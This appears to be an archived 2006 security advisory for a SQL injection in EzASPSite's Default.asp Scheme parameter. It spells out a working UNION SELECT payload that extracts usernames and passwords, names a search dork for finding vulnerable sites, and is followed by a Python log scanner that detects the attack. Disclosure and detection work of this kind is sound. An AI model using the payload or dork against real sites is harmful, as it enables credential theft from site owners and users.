EzASPSiteSQL.txt

2006-04-01T00:00:00
ID PACKETSTORM:45098
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-04-01T00:00:00

Description

                                        
                                            `  
--Security Report--  
Advisory: EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 29/03/06 21:33 PM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: EzASPSite (http://www.ezaspsite.com)  
Version: 2.0 RC3; prior versions must be affected as well.  
About: A remote attacker can inject arbitrary SQL queries through the   
Scheme parameter of Default.asp.  
Level: Critical  
---  
How&Example:   
GET -> http://[victim]/[EZASPDir]/Default.asp?Scheme=[SQL]  
EXAMPLE ->   
  
http://[victim]/[EZASPDir]/Default.asp?Scheme=-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,  
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',  
0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1  
With this example a remote attacker can leak the specified users' login   
information from the database.  
---  
Timeline:  
* 29/03/2006: Vulnerability found.  
* 29/03/2006: Vendor contacted; awaiting reply.  
---  
Exploit:  
http://www.nukedx.com/?getxpl=22  
---  
Dorks: "Powered By EzASPSite v2.0 RC3"  
---  
Original advisory can be found at: http://www.nukedx.com/?viewdoc=22  
`
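
Detection side of the request shape described above, as an added example that is not part of the original advisory or of EzASPSite: it scans an IIS W3C log for Default.asp hits whose Scheme value is not a plain token. Assumptions: the log carries c-ip, cs-uri-stem and cs-uri-query fields, a legitimate Scheme value is a short alphanumeric token, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate Scheme value is a short token (letters, digits, '_').
TOKEN = re.compile(r"[A-Za-z0-9_]{1,32}")
SQL_HINT = re.compile(r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|--|;|'", re.I | re.S)

def classify_scheme(query):
    """Return None if every Scheme value is a plain token, else a reason string."""
    # parse_qsl percent-decodes and maps '+' to space, so encoded variants match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() != "scheme":  # ASP treats parameter names case-insensitively
            continue
        if SQL_HINT.search(value):
            return "sql-injection-pattern"
        if not TOKEN.fullmatch(value):
            return "unexpected-characters"
    return None

def scan_w3c(lines):
    """Yield (client_ip, reason) for suspicious Default.asp hits in an IIS W3C log."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/default.asp"):
            continue
        reason = classify_scheme(row.get("cs-uri-query", "-"))
        if reason:
            yield row.get("c-ip", "?"), reason

# Constructed sample log (documentation IP addresses, shortened query strings).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-03-30 10:00:01 192.0.2.10 GET /ez/Default.asp Scheme=Blue 200
2006-03-30 10:00:07 198.51.100.7 GET /ez/Default.asp Scheme=-1+UNION+SELECT+0,password,username+from+tblAuthor+where+Group_ID=1 200
2006-03-30 10:00:09 198.51.100.7 GET /ez/default.asp scheme=-1%20union%20select%200,0 200
2006-03-30 10:00:12 192.0.2.11 GET /ez/forum.asp Scheme=-1+UNION+SELECT+0 200
2006-03-30 10:00:15 192.0.2.12 GET /ez/Default.asp Scheme=2%2B2 200
""".splitlines()

if __name__ == "__main__":
    for ip, reason in scan_w3c(SAMPLE_LOG):
        print(ip, reason)
```

The forum.asp line is ignored because the advisory names only Default.asp; widen the stem check if other pages read the same parameter.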